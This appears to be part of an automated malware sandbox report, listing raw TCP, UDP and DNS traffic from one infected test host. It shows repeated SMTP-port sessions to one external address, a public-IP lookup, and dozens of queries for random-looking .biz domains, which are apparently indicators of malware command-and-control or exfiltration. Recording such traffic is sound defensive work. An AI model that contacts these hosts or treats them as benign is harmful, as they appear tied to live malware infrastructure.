Jan 10, 2025 16:03:09.184169054 CET	587	50069	51.195.88.199	192.168.2.4
Jan 10, 2025 16:03:09.369385958 CET	587	50069	51.195.88.199	192.168.2.4
Jan 10, 2025 16:03:09.369764090 CET	50069	587	192.168.2.4	51.195.88.199
Jan 10, 2025 16:03:09.374596119 CET	587	50069	51.195.88.199	192.168.2.4
Jan 10, 2025 16:03:09.576216936 CET	587	50069	51.195.88.199	192.168.2.4
Jan 10, 2025 16:03:09.576658964 CET	50069	587	192.168.2.4	51.195.88.199
Jan 10, 2025 16:03:09.581480980 CET	587	50069	51.195.88.199	192.168.2.4
Jan 10, 2025 16:03:10.513552904 CET	2049	50067	212.162.149.53	192.168.2.4
Jan 10, 2025 16:03:10.515201092 CET	50067	2049	192.168.2.4	212.162.149.53
Jan 10, 2025 16:03:10.515202045 CET	50067	2049	192.168.2.4	212.162.149.53
Jan 10, 2025 16:03:11.423342943 CET	587	50069	51.195.88.199	192.168.2.4
Jan 10, 2025 16:03:11.426141977 CET	50069	587	192.168.2.4	51.195.88.199
Jan 10, 2025 16:03:11.430994987 CET	587	50069	51.195.88.199	192.168.2.4
Jan 10, 2025 16:03:11.616152048 CET	587	50069	51.195.88.199	192.168.2.4
Jan 10, 2025 16:03:11.619152069 CET	50069	587	192.168.2.4	51.195.88.199
Jan 10, 2025 16:03:11.624166012 CET	587	50069	51.195.88.199	192.168.2.4
Jan 10, 2025 16:03:11.624406099 CET	50069	587	192.168.2.4	51.195.88.199
Jan 10, 2025 16:03:15.145859003 CET	50052	80	192.168.2.4	13.251.16.150
Jan 10, 2025 16:03:15.149996996 CET	50070	80	192.168.2.4	13.251.16.150
Jan 10, 2025 16:03:15.155328035 CET	80	50070	13.251.16.150	192.168.2.4
Jan 10, 2025 16:03:15.155416965 CET	50070	80	192.168.2.4	13.251.16.150
Jan 10, 2025 16:03:15.155647039 CET	50070	80	192.168.2.4	13.251.16.150
Jan 10, 2025 16:03:15.155673981 CET	50070	80	192.168.2.4	13.251.16.150
Jan 10, 2025 16:03:15.160489082 CET	80	50070	13.251.16.150	192.168.2.4
Jan 10, 2025 16:03:15.160516977 CET	80	50070	13.251.16.150	192.168.2.4
Jan 10, 2025 16:03:15.523336887 CET	50071	2049	192.168.2.4	212.162.149.53
Jan 10, 2025 16:03:15.528157949 CET	2049	50071	212.162.149.53	192.168.2.4
Jan 10, 2025 16:03:15.528239012 CET	50071	2049	192.168.2.4	212.162.149.53
Jan 10, 2025 16:03:15.528479099 CET	50071	2049	192.168.2.4	212.162.149.53
Jan 10, 2025 16:03:15.533305883 CET	2049	50071	212.162.149.53	192.168.2.4
Jan 10, 2025 16:03:16.733138084 CET	50072	587	192.168.2.4	51.195.88.199
Jan 10, 2025 16:03:16.738056898 CET	587	50072	51.195.88.199	192.168.2.4
Jan 10, 2025 16:03:16.740175962 CET	50072	587	192.168.2.4	51.195.88.199
Jan 10, 2025 16:03:17.242988110 CET	49739	80	192.168.2.4	76.223.26.96
Jan 10, 2025 16:03:17.243066072 CET	49813	80	192.168.2.4	208.117.43.225
Jan 10, 2025 16:03:17.248083115 CET	80	49739	76.223.26.96	192.168.2.4
Jan 10, 2025 16:03:17.248167992 CET	49739	80	192.168.2.4	76.223.26.96
Jan 10, 2025 16:03:17.248348951 CET	80	49813	208.117.43.225	192.168.2.4
Jan 10, 2025 16:03:17.248419046 CET	49813	80	192.168.2.4	208.117.43.225
Jan 10, 2025 16:03:17.491086006 CET	587	50072	51.195.88.199	192.168.2.4
Jan 10, 2025 16:03:17.491524935 CET	50072	587	192.168.2.4	51.195.88.199
Jan 10, 2025 16:03:17.496439934 CET	587	50072	51.195.88.199	192.168.2.4
Jan 10, 2025 16:03:17.670133114 CET	587	50072	51.195.88.199	192.168.2.4
Jan 10, 2025 16:03:17.673007965 CET	50072	587	192.168.2.4	51.195.88.199
Jan 10, 2025 16:03:17.677822113 CET	587	50072	51.195.88.199	192.168.2.4
Jan 10, 2025 16:03:17.851684093 CET	587	50072	51.195.88.199	192.168.2.4
Jan 10, 2025 16:03:17.852335930 CET	50072	587	192.168.2.4	51.195.88.199
Jan 10, 2025 16:03:17.857171059 CET	587	50072	51.195.88.199	192.168.2.4
Jan 10, 2025 16:03:18.049958944 CET	587	50072	51.195.88.199	192.168.2.4
Jan 10, 2025 16:03:18.049987078 CET	587	50072	51.195.88.199	192.168.2.4
Jan 10, 2025 16:03:18.050000906 CET	587	50072	51.195.88.199	192.168.2.4
Jan 10, 2025 16:03:18.050057888 CET	50072	587	192.168.2.4	51.195.88.199
Jan 10, 2025 16:03:18.065618992 CET	50072	587	192.168.2.4	51.195.88.199
Jan 10, 2025 16:03:18.070461035 CET	587	50072	51.195.88.199	192.168.2.4
Jan 10, 2025 16:03:18.244137049 CET	587	50072	51.195.88.199	192.168.2.4
Jan 10, 2025 16:03:18.245142937 CET	50072	587	192.168.2.4	51.195.88.199
Jan 10, 2025 16:03:18.250001907 CET	587	50072	51.195.88.199	192.168.2.4
Jan 10, 2025 16:03:18.423659086 CET	587	50072	51.195.88.199	192.168.2.4
Jan 10, 2025 16:03:18.423888922 CET	50072	587	192.168.2.4	51.195.88.199
Jan 10, 2025 16:03:18.429429054 CET	587	50072	51.195.88.199	192.168.2.4
Jan 10, 2025 16:03:22.602792025 CET	587	50072	51.195.88.199	192.168.2.4
Jan 10, 2025 16:03:22.603090048 CET	50072	587	192.168.2.4	51.195.88.199
Jan 10, 2025 16:03:22.608402967 CET	587	50072	51.195.88.199	192.168.2.4
Jan 10, 2025 16:03:24.351557016 CET	587	50072	51.195.88.199	192.168.2.4
Jan 10, 2025 16:03:24.351772070 CET	50072	587	192.168.2.4	51.195.88.199
Jan 10, 2025 16:03:24.356606960 CET	587	50072	51.195.88.199	192.168.2.4
Jan 10, 2025 16:03:24.530201912 CET	587	50072	51.195.88.199	192.168.2.4
Jan 10, 2025 16:03:24.534656048 CET	50072	587	192.168.2.4	51.195.88.199
Jan 10, 2025 16:03:24.539628029 CET	587	50072	51.195.88.199	192.168.2.4
Jan 10, 2025 16:03:24.539695978 CET	50072	587	192.168.2.4	51.195.88.199
Jan 10, 2025 16:03:36.397049904 CET	50073	587	192.168.2.4	51.195.88.199
Jan 10, 2025 16:03:36.401978016 CET	587	50073	51.195.88.199	192.168.2.4
Jan 10, 2025 16:03:36.402122021 CET	50073	587	192.168.2.4	51.195.88.199
Jan 10, 2025 16:03:36.532644033 CET	80	50070	13.251.16.150	192.168.2.4
Jan 10, 2025 16:03:36.532710075 CET	50070	80	192.168.2.4	13.251.16.150
Jan 10, 2025 16:03:36.532751083 CET	50070	80	192.168.2.4	13.251.16.150
Jan 10, 2025 16:03:36.537497044 CET	80	50070	13.251.16.150	192.168.2.4
Jan 10, 2025 16:03:36.886881113 CET	2049	50071	212.162.149.53	192.168.2.4
Jan 10, 2025 16:03:36.886965990 CET	50071	2049	192.168.2.4	212.162.149.53
Jan 10, 2025 16:03:36.887307882 CET	50071	2049	192.168.2.4	212.162.149.53
Jan 10, 2025 16:03:37.047382116 CET	587	50073	51.195.88.199	192.168.2.4
Jan 10, 2025 16:03:37.047571898 CET	50073	587	192.168.2.4	51.195.88.199
Jan 10, 2025 16:03:37.052345991 CET	587	50073	51.195.88.199	192.168.2.4
Jan 10, 2025 16:03:37.231203079 CET	587	50073	51.195.88.199	192.168.2.4
Jan 10, 2025 16:03:37.231394053 CET	50073	587	192.168.2.4	51.195.88.199
Jan 10, 2025 16:03:37.236247063 CET	587	50073	51.195.88.199	192.168.2.4
Jan 10, 2025 16:03:37.415010929 CET	587	50073	51.195.88.199	192.168.2.4
Jan 10, 2025 16:03:37.416336060 CET	50073	587	192.168.2.4	51.195.88.199
Jan 10, 2025 16:03:37.421281099 CET	587	50073	51.195.88.199	192.168.2.4
Jan 10, 2025 16:03:37.605588913 CET	587	50073	51.195.88.199	192.168.2.4
Jan 10, 2025 16:03:37.605638027 CET	587	50073	51.195.88.199	192.168.2.4
Jan 10, 2025 16:03:37.605674982 CET	587	50073	51.195.88.199	192.168.2.4
Jan 10, 2025 16:03:37.605712891 CET	50073	587	192.168.2.4	51.195.88.199
Jan 10, 2025 16:03:37.612763882 CET	50073	587	192.168.2.4	51.195.88.199
Jan 10, 2025 16:03:37.617660046 CET	587	50073	51.195.88.199	192.168.2.4
Jan 10, 2025 16:03:37.796591997 CET	587	50073	51.195.88.199	192.168.2.4
Jan 10, 2025 16:03:37.800702095 CET	50073	587	192.168.2.4	51.195.88.199
Jan 10, 2025 16:03:37.807010889 CET	587	50073	51.195.88.199	192.168.2.4
Jan 10, 2025 16:03:37.985688925 CET	587	50073	51.195.88.199	192.168.2.4
Jan 10, 2025 16:03:37.988632917 CET	50073	587	192.168.2.4	51.195.88.199
Jan 10, 2025 16:03:37.993485928 CET	587	50073	51.195.88.199	192.168.2.4
Jan 10, 2025 16:03:38.172472954 CET	587	50073	51.195.88.199	192.168.2.4
Jan 10, 2025 16:03:38.172785044 CET	50073	587	192.168.2.4	51.195.88.199
Jan 10, 2025 16:03:38.177686930 CET	587	50073	51.195.88.199	192.168.2.4
Jan 10, 2025 16:03:40.359610081 CET	587	50073	51.195.88.199	192.168.2.4
Jan 10, 2025 16:03:40.359786034 CET	50073	587	192.168.2.4	51.195.88.199
Jan 10, 2025 16:03:40.364666939 CET	587	50073	51.195.88.199	192.168.2.4
Jan 10, 2025 16:03:40.543224096 CET	587	50073	51.195.88.199	192.168.2.4
Jan 10, 2025 16:03:40.543720007 CET	50073	587	192.168.2.4	51.195.88.199
Jan 10, 2025 16:03:40.549195051 CET	587	50073	51.195.88.199	192.168.2.4
Jan 10, 2025 16:03:40.549268007 CET	50073	587	192.168.2.4	51.195.88.199
Jan 10, 2025 16:03:41.897043943 CET	50075	2049	192.168.2.4	212.162.149.53
Jan 10, 2025 16:03:41.901998997 CET	2049	50075	212.162.149.53	192.168.2.4
Jan 10, 2025 16:03:41.903886080 CET	50075	2049	192.168.2.4	212.162.149.53
Jan 10, 2025 16:03:41.904006004 CET	50075	2049	192.168.2.4	212.162.149.53
Jan 10, 2025 16:03:41.908876896 CET	2049	50075	212.162.149.53	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 10, 2025 16:01:27.101613045 CET	51929	53	192.168.2.4	1.1.1.1
Jan 10, 2025 16:01:27.109097004 CET	53	51929	1.1.1.1	192.168.2.4
Jan 10, 2025 16:01:27.171578884 CET	63786	53	192.168.2.4	1.1.1.1
Jan 10, 2025 16:01:27.178436041 CET	53	63786	1.1.1.1	192.168.2.4
Jan 10, 2025 16:01:29.461461067 CET	59190	53	192.168.2.4	1.1.1.1
Jan 10, 2025 16:01:29.468600035 CET	53	59190	1.1.1.1	192.168.2.4
Jan 10, 2025 16:01:30.128961086 CET	57350	53	192.168.2.4	1.1.1.1
Jan 10, 2025 16:01:30.137773037 CET	53	57350	1.1.1.1	192.168.2.4
Jan 10, 2025 16:01:32.614181995 CET	64095	53	192.168.2.4	1.1.1.1
Jan 10, 2025 16:01:32.621710062 CET	53	64095	1.1.1.1	192.168.2.4
Jan 10, 2025 16:01:33.782495975 CET	51252	53	192.168.2.4	1.1.1.1
Jan 10, 2025 16:01:33.789865971 CET	53	51252	1.1.1.1	192.168.2.4
Jan 10, 2025 16:01:34.352890015 CET	52171	53	192.168.2.4	1.1.1.1
Jan 10, 2025 16:01:34.360424042 CET	53	52171	1.1.1.1	192.168.2.4
Jan 10, 2025 16:01:35.356473923 CET	62851	53	192.168.2.4	1.1.1.1
Jan 10, 2025 16:01:35.363436937 CET	53	62851	1.1.1.1	192.168.2.4
Jan 10, 2025 16:01:36.500746012 CET	57076	53	192.168.2.4	1.1.1.1
Jan 10, 2025 16:01:36.508244038 CET	53	57076	1.1.1.1	192.168.2.4
Jan 10, 2025 16:01:37.079022884 CET	61497	53	192.168.2.4	1.1.1.1
Jan 10, 2025 16:01:37.086107969 CET	53	61497	1.1.1.1	192.168.2.4
Jan 10, 2025 16:01:37.087260962 CET	60692	53	192.168.2.4	1.1.1.1
Jan 10, 2025 16:01:37.095841885 CET	53	60692	1.1.1.1	192.168.2.4
Jan 10, 2025 16:01:38.738080978 CET	55622	53	192.168.2.4	1.1.1.1
Jan 10, 2025 16:01:38.745691061 CET	53	55622	1.1.1.1	192.168.2.4
Jan 10, 2025 16:01:38.746243000 CET	58437	53	192.168.2.4	1.1.1.1
Jan 10, 2025 16:01:38.754079103 CET	53	58437	1.1.1.1	192.168.2.4
Jan 10, 2025 16:01:38.754736900 CET	51313	53	192.168.2.4	1.1.1.1
Jan 10, 2025 16:01:38.762949944 CET	53	51313	1.1.1.1	192.168.2.4
Jan 10, 2025 16:01:43.163228035 CET	57717	53	192.168.2.4	1.1.1.1
Jan 10, 2025 16:01:43.170732975 CET	53	57717	1.1.1.1	192.168.2.4
Jan 10, 2025 16:01:51.181024075 CET	54758	53	192.168.2.4	1.1.1.1
Jan 10, 2025 16:01:51.188332081 CET	53	54758	1.1.1.1	192.168.2.4
Jan 10, 2025 16:01:52.776022911 CET	64338	53	192.168.2.4	1.1.1.1
Jan 10, 2025 16:01:52.876610994 CET	53	64338	1.1.1.1	192.168.2.4
Jan 10, 2025 16:01:54.602247953 CET	60544	53	192.168.2.4	1.1.1.1
Jan 10, 2025 16:01:54.609764099 CET	53	60544	1.1.1.1	192.168.2.4
Jan 10, 2025 16:01:55.680529118 CET	52425	53	192.168.2.4	1.1.1.1
Jan 10, 2025 16:01:55.773772001 CET	53	52425	1.1.1.1	192.168.2.4
Jan 10, 2025 16:01:57.900662899 CET	57003	53	192.168.2.4	1.1.1.1
Jan 10, 2025 16:01:57.909383059 CET	53	57003	1.1.1.1	192.168.2.4
Jan 10, 2025 16:01:58.842406034 CET	50508	53	192.168.2.4	1.1.1.1
Jan 10, 2025 16:01:58.849674940 CET	53	50508	1.1.1.1	192.168.2.4
Jan 10, 2025 16:01:59.940484047 CET	58473	53	192.168.2.4	1.1.1.1
Jan 10, 2025 16:01:59.947577953 CET	53	58473	1.1.1.1	192.168.2.4
Jan 10, 2025 16:02:00.988096952 CET	54733	53	192.168.2.4	1.1.1.1
Jan 10, 2025 16:02:00.995433092 CET	53	54733	1.1.1.1	192.168.2.4
Jan 10, 2025 16:02:01.921263933 CET	50711	53	192.168.2.4	1.1.1.1
Jan 10, 2025 16:02:02.029907942 CET	53	50711	1.1.1.1	192.168.2.4
Jan 10, 2025 16:02:02.921206951 CET	51991	53	192.168.2.4	1.1.1.1
Jan 10, 2025 16:02:02.929240942 CET	53	51991	1.1.1.1	192.168.2.4
Jan 10, 2025 16:02:04.512742043 CET	64617	53	192.168.2.4	1.1.1.1
Jan 10, 2025 16:02:04.520121098 CET	53	64617	1.1.1.1	192.168.2.4
Jan 10, 2025 16:02:05.221375942 CET	51419	53	192.168.2.4	1.1.1.1
Jan 10, 2025 16:02:05.228740931 CET	53	51419	1.1.1.1	192.168.2.4
Jan 10, 2025 16:02:06.256273031 CET	58813	53	192.168.2.4	1.1.1.1
Jan 10, 2025 16:02:06.263951063 CET	53	58813	1.1.1.1	192.168.2.4
Jan 10, 2025 16:02:07.225975990 CET	54794	53	192.168.2.4	1.1.1.1
Jan 10, 2025 16:02:07.328587055 CET	53	54794	1.1.1.1	192.168.2.4
Jan 10, 2025 16:02:07.952503920 CET	56226	53	192.168.2.4	1.1.1.1
Jan 10, 2025 16:02:07.963197947 CET	53	56226	1.1.1.1	192.168.2.4
Jan 10, 2025 16:02:09.095344067 CET	54902	53	192.168.2.4	1.1.1.1
Jan 10, 2025 16:02:09.103147984 CET	53	54902	1.1.1.1	192.168.2.4
Jan 10, 2025 16:02:10.045783043 CET	49413	53	192.168.2.4	1.1.1.1
Jan 10, 2025 16:02:10.053721905 CET	53	49413	1.1.1.1	192.168.2.4
Jan 10, 2025 16:02:10.936888933 CET	52926	53	192.168.2.4	1.1.1.1
Jan 10, 2025 16:02:10.944336891 CET	53	52926	1.1.1.1	192.168.2.4
Jan 10, 2025 16:02:12.576160908 CET	61156	53	192.168.2.4	1.1.1.1
Jan 10, 2025 16:02:12.758227110 CET	53	61156	1.1.1.1	192.168.2.4
Jan 10, 2025 16:02:13.761702061 CET	65077	53	192.168.2.4	1.1.1.1
Jan 10, 2025 16:02:13.941082954 CET	53	65077	1.1.1.1	192.168.2.4
Jan 10, 2025 16:02:15.558515072 CET	55170	53	192.168.2.4	1.1.1.1
Jan 10, 2025 16:02:15.565977097 CET	53	55170	1.1.1.1	192.168.2.4
Jan 10, 2025 16:02:16.245546103 CET	55195	53	192.168.2.4	1.1.1.1
Jan 10, 2025 16:02:16.252448082 CET	53	55195	1.1.1.1	192.168.2.4
Jan 10, 2025 16:02:16.948503971 CET	62187	53	192.168.2.4	1.1.1.1
Jan 10, 2025 16:02:16.956022024 CET	53	62187	1.1.1.1	192.168.2.4
Jan 10, 2025 16:02:18.736501932 CET	62975	53	192.168.2.4	1.1.1.1
Jan 10, 2025 16:02:18.743555069 CET	53	62975	1.1.1.1	192.168.2.4
Jan 10, 2025 16:02:18.746406078 CET	54754	53	192.168.2.4	1.1.1.1
Jan 10, 2025 16:02:18.754337072 CET	53	54754	1.1.1.1	192.168.2.4
Jan 10, 2025 16:02:19.806787968 CET	49438	53	192.168.2.4	1.1.1.1
Jan 10, 2025 16:02:19.814213037 CET	53	49438	1.1.1.1	192.168.2.4
Jan 10, 2025 16:02:20.561911106 CET	62553	53	192.168.2.4	1.1.1.1
Jan 10, 2025 16:02:20.569376945 CET	53	62553	1.1.1.1	192.168.2.4
Jan 10, 2025 16:02:22.235070944 CET	58224	53	192.168.2.4	1.1.1.1
Jan 10, 2025 16:02:22.244934082 CET	53	58224	1.1.1.1	192.168.2.4
Jan 10, 2025 16:02:23.892591953 CET	52309	53	192.168.2.4	1.1.1.1
Jan 10, 2025 16:02:23.899869919 CET	53	52309	1.1.1.1	192.168.2.4
Jan 10, 2025 16:02:24.945216894 CET	52846	53	192.168.2.4	1.1.1.1
Jan 10, 2025 16:02:24.952860117 CET	53	52846	1.1.1.1	192.168.2.4
Jan 10, 2025 16:02:26.490947962 CET	49498	53	192.168.2.4	1.1.1.1
Jan 10, 2025 16:02:26.499088049 CET	53	49498	1.1.1.1	192.168.2.4
Jan 10, 2025 16:02:28.073873997 CET	59548	53	192.168.2.4	1.1.1.1
Jan 10, 2025 16:02:28.081334114 CET	53	59548	1.1.1.1	192.168.2.4
Jan 10, 2025 16:02:29.395365000 CET	50739	53	192.168.2.4	1.1.1.1
Jan 10, 2025 16:02:29.402318954 CET	53	50739	1.1.1.1	192.168.2.4
Jan 10, 2025 16:02:30.338680029 CET	56966	53	192.168.2.4	1.1.1.1
Jan 10, 2025 16:02:30.345715046 CET	53	56966	1.1.1.1	192.168.2.4
Jan 10, 2025 16:02:32.183466911 CET	49233	53	192.168.2.4	1.1.1.1
Jan 10, 2025 16:02:32.191020012 CET	53	49233	1.1.1.1	192.168.2.4
Jan 10, 2025 16:02:33.011015892 CET	64257	53	192.168.2.4	1.1.1.1
Jan 10, 2025 16:02:33.018078089 CET	53	64257	1.1.1.1	192.168.2.4
Jan 10, 2025 16:02:33.920481920 CET	53816	53	192.168.2.4	1.1.1.1
Jan 10, 2025 16:02:33.928044081 CET	53	53816	1.1.1.1	192.168.2.4
Jan 10, 2025 16:02:36.750926018 CET	58747	53	192.168.2.4	1.1.1.1
Jan 10, 2025 16:02:36.758318901 CET	53	58747	1.1.1.1	192.168.2.4
Jan 10, 2025 16:02:37.527970076 CET	64263	53	192.168.2.4	1.1.1.1
Jan 10, 2025 16:02:37.535120964 CET	53	64263	1.1.1.1	192.168.2.4
Jan 10, 2025 16:02:38.943718910 CET	49922	53	192.168.2.4	1.1.1.1
Jan 10, 2025 16:02:38.950510025 CET	53	49922	1.1.1.1	192.168.2.4
Jan 10, 2025 16:02:39.670825005 CET	63932	53	192.168.2.4	1.1.1.1
Jan 10, 2025 16:02:39.678886890 CET	53	63932	1.1.1.1	192.168.2.4
Jan 10, 2025 16:02:39.679812908 CET	54722	53	192.168.2.4	1.1.1.1
Jan 10, 2025 16:02:39.687567949 CET	53	54722	1.1.1.1	192.168.2.4
Jan 10, 2025 16:02:41.174349070 CET	54571	53	192.168.2.4	1.1.1.1
Jan 10, 2025 16:02:41.181909084 CET	53	54571	1.1.1.1	192.168.2.4
Jan 10, 2025 16:02:41.969422102 CET	55200	53	192.168.2.4	1.1.1.1
Jan 10, 2025 16:02:41.976604939 CET	53	55200	1.1.1.1	192.168.2.4
Jan 10, 2025 16:02:44.828134060 CET	56271	53	192.168.2.4	1.1.1.1
Jan 10, 2025 16:02:44.835138083 CET	53	56271	1.1.1.1	192.168.2.4
Jan 10, 2025 16:03:36.533417940 CET	50849	53	192.168.2.4	1.1.1.1
Jan 10, 2025 16:03:36.540472984 CET	53	50849	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 10, 2025 16:01:27.101613045 CET	192.168.2.4	1.1.1.1	0x7829	Standard query (0)	pywolwnvd.biz	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:01:27.171578884 CET	192.168.2.4	1.1.1.1	0xf41b	Standard query (0)	api.ipify.org	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:01:29.461461067 CET	192.168.2.4	1.1.1.1	0x9699	Standard query (0)	ssbzmoy.biz	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:01:30.128961086 CET	192.168.2.4	1.1.1.1	0xf854	Standard query (0)	s82.gocheapweb.com	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:01:32.614181995 CET	192.168.2.4	1.1.1.1	0x63de	Standard query (0)	cvgrf.biz	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:01:33.782495975 CET	192.168.2.4	1.1.1.1	0xf355	Standard query (0)	npukfztj.biz	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:01:34.352890015 CET	192.168.2.4	1.1.1.1	0x1c10	Standard query (0)	przvgke.biz	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:01:35.356473923 CET	192.168.2.4	1.1.1.1	0x63fb	Standard query (0)	ww12.przvgke.biz	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:01:36.500746012 CET	192.168.2.4	1.1.1.1	0x73a8	Standard query (0)	ww7.przvgke.biz	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:01:37.079022884 CET	192.168.2.4	1.1.1.1	0xb603	Standard query (0)	zlenh.biz	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:01:37.087260962 CET	192.168.2.4	1.1.1.1	0x6381	Standard query (0)	knjghuig.biz	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:01:38.738080978 CET	192.168.2.4	1.1.1.1	0x239a	Standard query (0)	uhxqin.biz	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:01:38.746243000 CET	192.168.2.4	1.1.1.1	0x2f78	Standard query (0)	anpmnmxo.biz	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:01:38.754736900 CET	192.168.2.4	1.1.1.1	0x7da9	Standard query (0)	lpuegx.biz	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:01:43.163228035 CET	192.168.2.4	1.1.1.1	0x76db	Standard query (0)	vjaxhpbji.biz	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:01:51.181024075 CET	192.168.2.4	1.1.1.1	0xdcd2	Standard query (0)	xlfhhhm.biz	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:01:52.776022911 CET	192.168.2.4	1.1.1.1	0x6c5b	Standard query (0)	ifsaia.biz	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:01:54.602247953 CET	192.168.2.4	1.1.1.1	0xb4af	Standard query (0)	saytjshyf.biz	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:01:55.680529118 CET	192.168.2.4	1.1.1.1	0xcd0a	Standard query (0)	vcddkls.biz	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:01:57.900662899 CET	192.168.2.4	1.1.1.1	0x7269	Standard query (0)	fwiwk.biz	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:01:58.842406034 CET	192.168.2.4	1.1.1.1	0x64ea	Standard query (0)	ww7.fwiwk.biz	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:01:59.940484047 CET	192.168.2.4	1.1.1.1	0xa729	Standard query (0)	tbjrpv.biz	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:02:00.988096952 CET	192.168.2.4	1.1.1.1	0x867	Standard query (0)	deoci.biz	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:02:01.921263933 CET	192.168.2.4	1.1.1.1	0xa2f7	Standard query (0)	gytujflc.biz	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:02:02.921206951 CET	192.168.2.4	1.1.1.1	0xc89b	Standard query (0)	qaynky.biz	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:02:04.512742043 CET	192.168.2.4	1.1.1.1	0x7061	Standard query (0)	bumxkqgxu.biz	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:02:05.221375942 CET	192.168.2.4	1.1.1.1	0xb242	Standard query (0)	dwrqljrr.biz	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:02:06.256273031 CET	192.168.2.4	1.1.1.1	0x2efd	Standard query (0)	nqwjmb.biz	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:02:07.225975990 CET	192.168.2.4	1.1.1.1	0x866c	Standard query (0)	ytctnunms.biz	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:02:07.952503920 CET	192.168.2.4	1.1.1.1	0xc2e2	Standard query (0)	myups.biz	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:02:09.095344067 CET	192.168.2.4	1.1.1.1	0x92b1	Standard query (0)	oshhkdluh.biz	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:02:10.045783043 CET	192.168.2.4	1.1.1.1	0x1f4	Standard query (0)	yunalwv.biz	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:02:10.936888933 CET	192.168.2.4	1.1.1.1	0x20f6	Standard query (0)	jpskm.biz	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:02:12.576160908 CET	192.168.2.4	1.1.1.1	0x68f1	Standard query (0)	lrxdmhrr.biz	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:02:13.761702061 CET	192.168.2.4	1.1.1.1	0x9289	Standard query (0)	wllvnzb.biz	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:02:15.558515072 CET	192.168.2.4	1.1.1.1	0x64c6	Standard query (0)	gnqgo.biz	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:02:16.245546103 CET	192.168.2.4	1.1.1.1	0x9fa7	Standard query (0)	jhvzpcfg.biz	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:02:16.948503971 CET	192.168.2.4	1.1.1.1	0xee56	Standard query (0)	acwjcqqv.biz	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:02:18.736501932 CET	192.168.2.4	1.1.1.1	0x5c18	Standard query (0)	lejtdj.biz	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:02:18.746406078 CET	192.168.2.4	1.1.1.1	0xd857	Standard query (0)	vyome.biz	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:02:19.806787968 CET	192.168.2.4	1.1.1.1	0xef68	Standard query (0)	yauexmxk.biz	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:02:20.561911106 CET	192.168.2.4	1.1.1.1	0x84e8	Standard query (0)	iuzpxe.biz	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:02:22.235070944 CET	192.168.2.4	1.1.1.1	0x741d	Standard query (0)	sxmiywsfv.biz	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:02:23.892591953 CET	192.168.2.4	1.1.1.1	0x3e32	Standard query (0)	vrrazpdh.biz	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:02:24.945216894 CET	192.168.2.4	1.1.1.1	0xbeae	Standard query (0)	ftxlah.biz	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:02:26.490947962 CET	192.168.2.4	1.1.1.1	0x690b	Standard query (0)	typgfhb.biz	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:02:28.073873997 CET	192.168.2.4	1.1.1.1	0xb227	Standard query (0)	esuzf.biz	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:02:29.395365000 CET	192.168.2.4	1.1.1.1	0x5bbc	Standard query (0)	gvijgjwkh.biz	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:02:30.338680029 CET	192.168.2.4	1.1.1.1	0xab7a	Standard query (0)	qpnczch.biz	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:02:32.183466911 CET	192.168.2.4	1.1.1.1	0x7b6d	Standard query (0)	brsua.biz	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:02:33.011015892 CET	192.168.2.4	1.1.1.1	0x9498	Standard query (0)	dlynankz.biz	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:02:33.920481920 CET	192.168.2.4	1.1.1.1	0xcb5c	Standard query (0)	oflybfv.biz	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:02:36.750926018 CET	192.168.2.4	1.1.1.1	0x849f	Standard query (0)	yhqqc.biz	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:02:37.527970076 CET	192.168.2.4	1.1.1.1	0xc61b	Standard query (0)	mnjmhp.biz	A (IP address)	IN (0x0001)	false
